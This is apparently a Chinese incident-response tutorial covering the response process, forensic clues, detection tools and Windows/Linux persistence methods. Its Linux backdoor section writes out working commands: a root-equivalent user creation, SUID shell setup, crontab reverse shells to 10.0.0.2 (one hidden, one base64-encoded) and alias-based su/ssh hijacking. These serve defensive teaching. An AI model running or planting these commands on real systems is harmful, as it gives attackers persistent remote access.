应急响应(上)
5.1 相关概念
应急响应(Incident Response):
安全人员在遇到突发事件后所采取的措施和行动。
突发事件:
发生在计算机系统或网络上威胁安全的事件。如黑客入侵、信息窃取等。
事件响应:
信息安全生命周期的必要组成部分,这个生命周期包括:对策、检测和响应。
场景:
运维人员无法迅速处理安全事件时,需要第三方厂商提供一种能发现并解决问题的有效服务手段。
职责:
控制影响范围确保业务正常运转、还原攻击场景、找到问题根源、最后追溯攻击源。
目的:
以最快速度恢复系统的保密性、完整性和可用性,阻止和减小安全事件带来的影响。
目标:
积极预防、及时发现、快速反应、确保恢复。
5.2 应急响应流程
1、通用型流程
1、准备(Preparation)
安全支撑平台:防火墙、入侵检测系统(IDS)等
日常安全管理:运维操作记录
应急预案:设备故障应急操作、攻击如何处理、获取外部支持、风险分析(规避措施)
2、检测(Detection)
主动发现:预警的及时性和全局性,为后续处理争取时间
被动发现:网络使用者的报告,业务用户的投诉
影响范围:单用户、多用户,已发生的、处于危险中的(还未发生)
3、分类(Classification)
攻击事件:大流量攻击、业务应用攻击
入侵事件:应用系统后门、web站点入侵
病毒事件:网络蠕虫病毒、ARP欺骗病毒
其他:网络或系统异常、敏感信息泄露
4、抑制(Containment)
已发生安全事件的:采取隔离、用边界控制设备防止网络区域内相互影响
处于危险中的:采取补救加固、漏洞扫描与修补、安全测试
5、根除(Eradication)
安全事件分析-了解危害程度-确定事件原因-针对性防范措施-是否有存在遗漏-调整平台安全策略
6、恢复(Recovery)
对主机和网络控制的恢复
从备份中恢复受损的数据
调整可能影响业务正常运转的策略
7、后续(Follow-up)
总结并指导今后的应急管理
必要时申请司法程序介入
2、个人总结的流程
步骤简述:接案–取证–分析侦察–锁定嫌疑人–结案
接案
1、因为攻击者经验、隐蔽性不足被发现
炫耀型——上传黑页、到此一游.txt
政治目的型——重点攻击政府站点、Anonymous(匿名者)
利益型——暗链、SEO推广、勒索、挖矿
抓鸡型——1433、mysql自动抓鸡、SSH暴力破解
持续型——长期潜伏式攻击、APT
DDOS攻击型——SYN Flood、CC攻击
蠕虫感染型——内网传播、Conficker、WannaCry
取证
1、保护第一现场
操作日志、应用日志
攻击者的残留文件
2、不轻信一面之词
与目击者交流相关细节
亲自核实所述、转述情况
分析侦察
1、三要素法-时间
攻击发现时间
-------目击者报案时间
后门文件时间
-------windows时间问题(创建时间等可以修改)
-------Linux下ctime(change time)
异常时间段内
-------web访问日志、操作系统认证日志、应用设备日志
2、三要素法-地点
webshell首次出现目录
-------上传漏洞——img_upload
-------代码执行——dedecms变量覆盖
-------后台上传——system_upload
残留文件所在目录
-------自动化攻击——批处理文件、shell脚本
-------人为上传\下载——桌面、下载目录
3、三要素法-事件
应用后台日志
-------登录日志——是否有非法账户
-------篡改记录——是否是从数据库修改
-------上传点——黑客最钟爱功能
web访问日志
-------SQL注入——order by
-------暴力破解——认证接口页面
-------代码执行——Struts2、java反序列化漏洞
对外应用访问日志
-------FTP访问日志——日志文件配置
-------SSH认证日志——Accept、Failed
操作历史记录
-------web运行账户——反弹执行命令
-------root用户——是否被提权
-------易受攻击账户——oracle、db2、weblogic
登录日志为二进制格式文件,无法被逐条删除(日志要么全清,要么完整)
—linux
-------wtmp—who -u /var/log/wtmp
-------btmp—last -f /var/log/btmp
-------lastlog—lastlog -f /var/log/lastlog
—windows
-------事件日志大小配置——默认覆盖
-------安全性事件——审核成功与失败
操作系统完整性检查
-------进程:非法程序、dll注入、/proc/PID
-------网络:监听端口、异常连接
-------账户:UID=0(注意Liunx下是无隐藏账号的)、administrators、admin$
-------启动项:crontab –l、inittab、rc.local、services.msc、msconfig
4、回溯攻击法
分析可能被攻击途径,进行模拟攻击
----主机监听端口整理
-------1、对应应用
-----------弱口令——FTP、SSH
-----------暴力破解——MYSQL、MSSQL
-----------代码执行——web攻击、应用漏洞
-------2、对外端口——防火墙策略
密码泄露
-------厂商应用口令——搜索引擎
-------数据库口令——web应用配置文件
中间人攻击
-------ARP攻击——劫持与嗅探
内部发起攻击
-------统一口令——windows域环境
-------溢出攻击——SMB缓冲区漏洞
5、经验法
攻击者常用的目录
-------/var/tmp、/tmp、/dev/shm、RECYCLER
特征文件
-------/tmp/angel_bc—phpspy木马反弹脚本
-------bqufe.sys(随机)—PcShare类远控木马
-------hxdef100.ini—Hacker Defender Rootkit
黑客惯用手法
-------操作系统后门:ushift后门、sshd backdoor
-------一句话木马:插入文件、php变形、包含图片
利用搜索功能
-------包含隐藏文件——Everything
-------n*24H内修改过的文件——find / -ctime -n
锁定嫌疑人
1、木马分析
静态逆向分析——IDA、OllyDbg
动态分析——抓包、内存截取
2、日志分析
web访问——webshell首次访问IP
登录记录——windows&linux
通过nmap扫描确认是否为跳板
结案
1、技术层面
漏洞确认及修补、后门清理与观察、涉及知识点学习、安全攻防技能培训
2、管理层面
报告整理输出、详细整改建议、攻击过程再现、流程制度规范
5.3 应急响应常用工具
常用应急响应工具及常用命令如下:
常见工具-windows
系统启动相关: Autoruns 、Msconfig 、Net
系统进程分析监控: Process explorer、Process Monitor、Tasklist
端口网络状态: Tcpview、Currports、Netstat
综合安全检测: Wsyscheck、PowerTool、PCHunter、WIN64AST
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
常见工具-Linux
rookit检查: Rkhunter、chkrookit、LiveCD引导拯救光盘
系统相关命令: ps、pstree、pmap、top、killls、strings、strace、readelf、rmplsof、netstatchkconfig、crontab
- 1
- 2
- 3
- 4
- 5
- 6
- 7
通用检查工具
Webshell检查:WebShellKill、HwsKill、EverythingWebshell.py、find、grep、findstr
网络攻击相关: Sniffer Pro、WinArpAttackerTcpdump、wireshark、Colasoft Capsa
日志分析工具: Logview、LogParse、EmEditor
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
5.4 后门检测与查杀-windows/linux
1、常见的windows自启动方法
1、开始菜单\程序\启动
2、开机启动项(msconfig)
注册表:HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- 1
3、注册为系统服务(services.msc)
4、任务计划启动(Schedule)
5、AUTOEXEC.BAT(NT 5.x)
6、系统程序替换 (ctfmon、conime)
7、组策略脚本(gpedit.msc)
2、特殊的windows自启动方式
1、Load加载
HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows\load
- 1
2、Winlogon加载
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit
--管理系统各项启动顺序、逗号分隔加入其它程序
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify
–关联特定的事件(安全模式启动)、产生事件通知时检查并调用相关DLL
- 1
- 2
- 3
- 4
- 5
3、映像劫持IFEO
HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options
- 1
4、DLL劫持
lpk.dll、usp10.dll、ws2help.dll
- 1
5、关联特定程序
HKEY_CLASSES_ROOT\txtfile\Shell\open\command
HKLM\SOFTWARE\Microsoft\CommandProcessor\AutoRun
- 1
- 2
6、ActiveX自启动(DRAT2010)
HKLM\Software\Microsoft\ActiveSetup\InstalledComponents\{…}\stubpath
- 1
3、线程注入类木马
将自身线程注入到其他合法程序中,在宿主进程中,以线程的方式执行木马代码。以非进程方式执行代码,可以逃避进程查看器检查,实现进程隐藏。Process Explorer(增强任务管理器)、XueTr(手工杀毒软件)等工具具有查看结束线程以及挂起和恢复线程的功能。
代表木马:
灰鸽子远程控制(RAT)。
工具:
Process Explorer、XueTr
4、ActiveX启动类木马
Active Setup键值:
--HKLM\Software\Microsoft\ActiveSetup\InstalledComponents
- 1
已安装windows组件信息(office、IE、OS)。每个键值作为相应组件在系统中的ID标示。进入桌面时先于其它自启动程序加载。
StubPath=%systemroot%\Trojan.exe
- 1
通过线程注入方式,实现木马自身功能。
代表木马:
彩虹桥远程监控木马(Bifrost)。
工具:
PCHunter-手工杀毒软件
5、DLL注入类木马
由于windows系统服务过多,为了节省系统资源,微软将很多服务做成共享方式,交由svchost进程来启动。服务以dll形式实现,将执行程序指向svchost,由其调用相应服务的动态链接库文件来启动服务。
svchost作为宿主进程,并不提供任何服务系统。svchost是一个用于加载系统服务的宿主程序。此类木马更具迷惑性,同时容易绕过防火墙限制。
代表木马:
PcShare远程控制。
工具:
Wsyscheck-系统检测工具
6、SSDT HOOK类木马
System Services Descriptor Table(系统服务描述符表)。将Ring3下的Win32 API和Ring0下内核API函数相互联系起来,即告诉系统,需要调用的API在什么地方。
通过修改SSDT表的函数地址可以对常用windows函数及API进行hook,如杀毒软件的主动防御功能即采用此接口来实现监控。利用驱动程序在ring0态将SSDT恢复为原始状态,即可使安全软件的主动防御和监控功能失效。
代表木马:
gh0st。
工具:
PowerTool-手动杀毒辅助工具
7、windows常见后门
1、windows登陆界面:粘滞键(sethc)、放大镜(magnify)、屏幕键盘(osk)
2、密码截取记录:WinlogonHack、PwDump、wce
3、自启动相关:计划任务、组策略脚本、DLL劫持
4、其他:隐藏(克隆)账户、反弹程序
8、Linux自启动方式
1、/etc/rc.local 开机启动脚本
2、/etc/init.d/ 服务启动脚本
3、/etc/inittab 初始化配置文件
4、crond 自动调度任务(计划任务)
5、/etc/ld.so.preload 加载动态库.so文件
6、环境变量设置如:/etc/profile、.bash_profile、.bash_login、.bash_logout
7、使用patch并编译的文件覆盖正常程序
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
9、Linux常见后门
1、自启动相关配置文件修改
useradd -u 0 -o -g root -G root r00t;echo r00t:p@ssw0rd | chpasswd
- 1
2、SetUID权限位
chmod u+s /tmp/.bash
find / -perm -4000
- 1
- 2
3、SSHD相关后门
pam认证文件修改(pmap PID | grep security)
sshd backdoor(rpm -vf /usr/sbin/sshd)
- 1
- 2
10、Linux--crontab后门
1、添加任务
(crontab -l;echo '*/1 * * * * exec 9<>/dev/tcp/10.0.0.2/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -
- 1
2、隐藏任务
printf "*/1 * * * * exec 9<> /dev/tcp/10.0.0.2/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for 'whoami'%100c\n" | crontab -
- 1
3、base64编码
exec 9<> /dev/tcp/10.0.0.2/53;exec 0<&9;exec 1>&9
(echo '*/1 * * * * a=`echo "ZXhlYyA5PD4gL2Rldi90Y3AvMTAuMC4wLjIvN =="|base64 –d`;/bin/bash -c "$a";unset a')|crontab -
#注意闭合符号的组合
- 1
- 2
- 3
11、Linux—bash shell后门
1、.bash_profile
用户设置的环境变量,在登陆时执行,调用bashrc
- 1
2、.bashrc
登录及打开shell时读取执行,继承profile中变量
- 1
3、设置别名与函数。修改.bashrc文件
alias su="~/.subtty su"
alias ssh="~/.subtty ssh“
if [ -z "$SUBTTY" ]; then exec ~/.subtty; fi
- 1
- 2
- 3
12、Linux下相关工具
1、tripwire
文件系统完整性检查,建立指纹数据库。大小、HASH、所有者、群组、存取权限等
2、chkrootkit、rootkit hunter
恶意程序安全查杀工具。rootkit、后门、漏洞利用程序。基于特征关键字检索,可被绕过
13、Linux下手工分析
1、RPM包可信校验
rpm -Vf (ps/pstree/lsof/kill/netstat/ls/dir/find/sshd)
- 1
2、进程查看:
pstree / ps -aux (START列为程序开始运行时间)
- 1
3、端口状态及网络连接
netstat -lntp (非root用户只能看到部分连接的PID)
lsof -Pnl -i tcp:80
- 1
- 2
4、进程文件路径
ls -l /proc/PID/exe
- 1
5、结束进程
killall httpd
kill -9 “ps -ef | grep test | awk '{print $2}'”
- 1
- 2
6、状态检查
top(内存/CPU排序)、lsmod(内核模块)
ls -last(按修改时间排序)、stat(文件访问、修改、状态改动时间)
- 1
- 2
7、启动项检查
ls -lh /var/spool/cron/
chkconfig --list |grep 3:on
- 1
- 2
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- Spring(一)概述
什么是 Spring Spring 是由 Rod Johnson 组织和开发的一个分层的 Java SE/EE fu stack (一站式)轻量级开源框架,它以 loC ( Inversion of Control ,控制反转)和 AOP ( Aspect Oriented Programming , 面向切面编程)为内核,使用基本的 JavaBean 来完成以前只可能由 EJB(Enter…...
2024/3/13 23:29:56 - Web项目引入Agora SDK实现视频通话功能
零、前言简介:声网, Agora。一个专注移动端的高清实时通话云服务解决方案。(1)声网Agora成立于2013年,是实时音视频云行业开创者和全球领先的专业PaaS服务商。开发者只需简单调用Agora API,30分钟即可在应用内构建多种实时音视频互动场景。(2)声网的服务覆盖社交直播、…...
2024/3/13 23:29:55 - 应急响应(下)
5.5 后门检测与查杀-webshell 1、关于webshell 概念:存在于web服务器端的脚本后门,以asp、php、jsp等网页文件形式存在的一种命令执行环境 特性:与服务端正常脚本运行原理相同。可以绕过防火墙对主机进行操作。可进行文件上传、下载、命令执行等。webshell操作权限取决于解…...
2024/3/18 0:16:22 - JavaWeb之JavaScript高级
DOM简单学习: 1.功能 控制html文档的内容2.获取页面标签(元素)对象:Element document.getElementById("id值"):通过元素的id获取元素对象3.操作Element对象修改属性值明确获取的对象是哪一个? 查看API文档,找其中有哪些属性可以设置修改标签体内容 属性:innerHT…...
2024/3/13 23:29:53 - Leetcode 93.复原IP地址(Restore IP Addresses)
Leetcode 93.复原IP地址 1 题目描述(Leetcode题目链接)给定一个只包含数字的字符串,复原它并返回所有可能的 IP 地址格式。 有效的 IP 地址正好由四个整数(每个整数位于 0 到 255 之间组成),整数之间用 ‘.’ 分隔。 输入: "25525511135" 输出: ["255.255…...
2024/3/14 13:51:23 - jvm内存区域
文章目录jvm内存区域虚拟机栈(线程私有)本地方法栈(线程私有)程序计数器(线程私有)堆新生代老年代CMS算法中的promotion failed和concurrent mode failure方法区/永久代 jvm内存区域JVM内存区域主要分为线程私有区域[虚拟机栈、本地方法栈、程序计数器],线程共享区域[方…...
2024/3/14 13:51:23 - Java内部类基本介绍、如何实例化内部类和如何调用外部类属性和方法
一、 Java内部类分类: 1.非静态成员内部类: 内部类没有使用static关键字修饰,并且和外部类的成员变量和方法属于同一级别,这样的是非静态成员内部类(可以使用权限修饰符修饰,和final、abstract关键字修饰)。 public class Atest {private String name = "张三"…...
2024/3/25 5:14:28 - Python基础-5-for循环可迭代对象的遍历,循环嵌套,循环代码的优化技巧,推导式的创建
1、for循环和可迭代对象遍历 for 循环通常用于可迭代对象的遍历 for 变量 in 可迭代对象: 循环体语句 python包含以下几种可迭代对象:1、序列(字符串、列表、元组);2、字典;3、迭代器对象(iterator);4、生成器函数(generator) 2、字典的遍历 for x in d.keys() for x…...
2024/3/14 13:51:21 - intellij工程文件名都是红色+右键没有run选项
一般很有可能是直接导入一个工程文件夹导致的,检查这么几个方面:①工程目录结构与main所在的java文件开头的package语句不符合例如开头是package com.runoob.test那么工程目录文件夹必须是src/main/java/com/runoob/test②.java文件中没有package语句③.java文件中没有main语句…...
2024/3/14 13:51:22 - 外观模式
外观模式内容 为子系统中的一组接口提供一个一直的界面,外观模式定义了一个高层接口,这个接口是的这个系统更加容易的使用角色外观 子系统类优点减少了相互依赖性提高了灵活性提高了安全性代码实例 from abc import ABCMeta, abstractmethodclass Cpu():def run(self):print(…...
2024/3/14 13:51:17 - 聊天室应用后台实现:基于TCP连接的多进程并发服务器
聊天室功能: 1、响应多个客户端连接请求 2、服务端及客户端信息的交互由用户指定输入 3、服务端采用多进程处理,每一个客户端连接,都有单独的进程去处理信息的接受与发送 服务端实现: 1、采用TCP socket建立通信连接 2、采用多进程方式处理多个客户端的连接请求 3、采用信号…...
2024/3/13 15:10:04 - springboot的应用上下文
springboot上下文有两个ServletWebServerApplicationContext AnnotationConfigServletWebServerApplicationContext(继承上面)ServletWebServerApplicationContext该类属于spring-boot-2.1.1Release.jar中,是自springboot诞生就衍生出来的,是spring框架的应用上下文Applica…...
2024/3/14 13:51:16 - 山东理工大学第十二届ACM程序设计竞赛 - Cut the tree(树上启发式合并+线段树)
题目链接:点击查看题目大意:给一个具有 N 个节点的有根树,以 1 号节点为根,节点编号从 1 开始,点有点权。树的第 H 层权值为深度为 H 的所有点的点权之和。树的总权值为所有层权值的最大值。问分别割掉以 1,2,..,N 为根的子树后,剩余树的总权值为多少。题目分析:因为题目…...
2024/3/14 13:51:16 - MySQL事务处理
事务处理是一种机制,用来管理必须成批执行的MySQL操作,以保证数据库不包含不完整的操作结果。利用事务处理,可以保证一组操作不会中途停止,它们或者作为整体执行,或者完全不执行(除非明确指示)。如果没有错误发生,整组语句提交给(写到)数据库表。如果发生错误,则进行…...
2024/3/23 0:03:00 - python join()方法
原文链接:https://www.runoob.com/python/att-string-join.html 描述 insert() 函数用于将指定对象插入列表的指定位置。 语法 insert()方法语法: list.insert(index, obj) 参数index -- 对象 obj 需要插入的索引位置。 obj -- 要插入列表中的对象。返回值 该方法没有返回值,…...
2024/3/14 13:51:12 - Linux yum的离线安装使用
大佬的方法,亲测有效!赞!https://blog.csdn.net/qq805934132/article/details/82901568...
2024/3/14 7:48:49 - 代码快照图、UML的类图总结
快照图 (由MIT 6.031 02、08) 一个对象由圆圈表示,圆圈里的区域指向对应的值。一、可更改和不可更改 1.immutable如StringString为不变类型,被创建后一个String对象有一样的值,如果在String的字符串后加上其他的字符串,会创建一个新的String对象 2.mutable如StringBuilde…...
2024/3/13 23:30:06 - PLT-hook技术
最近在学习apk的hook,贴一下自己的理解。 以下内容仅为个人看法,不代表100%正确,如有错误还请指出。 1.什么是hook技术 hook技术是一种拦截用户函数调用的技术。通过hook技术可以实现统计用户对某些函数的调用次数,对函数注入新的功能的目标。比如我想知道一个游戏运行时PS…...
2024/3/13 23:30:04 - Nacos连接Mysql8.0+数据库踩坑
Nacos连接Mysql8.0+数据库踩坑 nacos使用mysql数据库做持久化时,如果mysql数据库版本是8.0+,需要在nacos安装目录下,新建plugins/mysql目录,在目录中放入合适的mysql驱动,这样nacos就能使用mysql8.0+作为持久化数据库...
2024/3/13 23:30:02 - 多线程总结和面试题
1)线程和进程概述: 线程:线程是进程的一个实体,是cpu调度和分配的基本单元。 进程:进程是具有一定独立功能的程序,它是系统进程资源和调度的一个独立单元。 2)线程和进程的区别:1 一个线程只属于一个进程,一个进程包含一个和多个线程。 2 进程都有独立的存储单元,而…...
2024/3/13 23:30:01
最新文章
- HarmonyOS-如何使用ArkTS声明式语法和基础组件,实现待办列表。
介绍 本篇Codelab将介绍如何使用ArkTS声明式语法和基础组件,实现简易待办列表。效果为点击某一事项,替换标签图片、虚化文字。效果如图所示: 相关概念 ArkTS语法:ArkTS是HarmonyOS的主要应用开发语言。ArkTS基于TypeScript&…...
2024/3/29 19:11:55 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/3/20 10:50:27 - 企业微信变更主体公证怎么弄?
企业微信变更主体有什么作用?现在很多公司都用企业微信来加客户,有时候辛辛苦苦积累了很多客户,但是公司却因为各种各样的原因需要注销,那么就需要通过企业微信变更主体的方法,把企业微信绑定的公司更改为最新的。企业…...
2024/3/29 13:04:17 - 【Spring 篇】SpringMVC的请求:舞台上的开端
在Web开发的舞台上,请求就如同一场充满激情的开端,而SpringMVC是这场表演的舞台主持人,它能够优雅地接收和处理各种请求,引领我们进入一个美妙的编码之旅。在本篇博客中,我们将深入探讨SpringMVC的请求处理机制&#x…...
2024/3/26 11:01:49 - cesium.js加载模型后,重新设置旋转角度属性值
// 加载模型var position Cesium.Cartesian3.fromDegrees(longitude, latitude, height);// 计算矩阵var rollAngleDegrees 15; // 设置翻滚角度var rollAngleRadians Cesium.Math.toRadians(rollAngleDegrees); // 将角度转换为弧度var orientation Cesium.Transforms.eas…...
2024/3/28 0:56:34 - 【外汇早评】美通胀数据走低,美元调整
原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...
2024/3/29 18:08:39 - 【原油贵金属周评】原油多头拥挤,价格调整
原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...
2024/3/29 18:08:34 - 【外汇周评】靓丽非农不及疲软通胀影响
原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...
2024/3/29 2:45:46 - 【原油贵金属早评】库存继续增加,油价收跌
原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...
2024/3/29 16:26:39 - 【外汇早评】日本央行会议纪要不改日元强势
原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...
2024/3/29 5:19:52 - 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响
原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...
2024/3/29 18:08:00 - 【外汇早评】美欲与伊朗重谈协议
原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...
2024/3/29 11:11:56 - 【原油贵金属早评】波动率飙升,市场情绪动荡
原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...
2024/3/29 1:13:26 - 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试
原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...
2024/3/29 8:28:16 - 【原油贵金属早评】市场情绪继续恶化,黄金上破
原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...
2024/3/29 7:41:19 - 【外汇早评】美伊僵持,风险情绪继续升温
原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...
2024/3/29 18:07:15 - 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势
原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...
2024/3/29 9:57:23 - 氧生福地 玩美北湖(上)——为时光守候两千年
原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...
2024/3/29 0:49:46 - 氧生福地 玩美北湖(中)——永春梯田里的美与鲜
原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...
2024/3/29 18:06:57 - 氧生福地 玩美北湖(下)——奔跑吧骚年!
原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...
2024/3/29 17:27:19 - 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!
原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...
2024/3/29 18:06:36 - 「发现」铁皮石斛仙草之神奇功效用于医用面膜
原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...
2024/3/29 18:06:22 - 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者
原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...
2024/3/28 18:26:34 - 广州械字号面膜生产厂家OEM/ODM4项须知!
原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...
2024/3/29 18:06:01 - 械字号医用眼膜缓解用眼过度到底有无作用?
原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...
2024/3/28 20:09:10 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
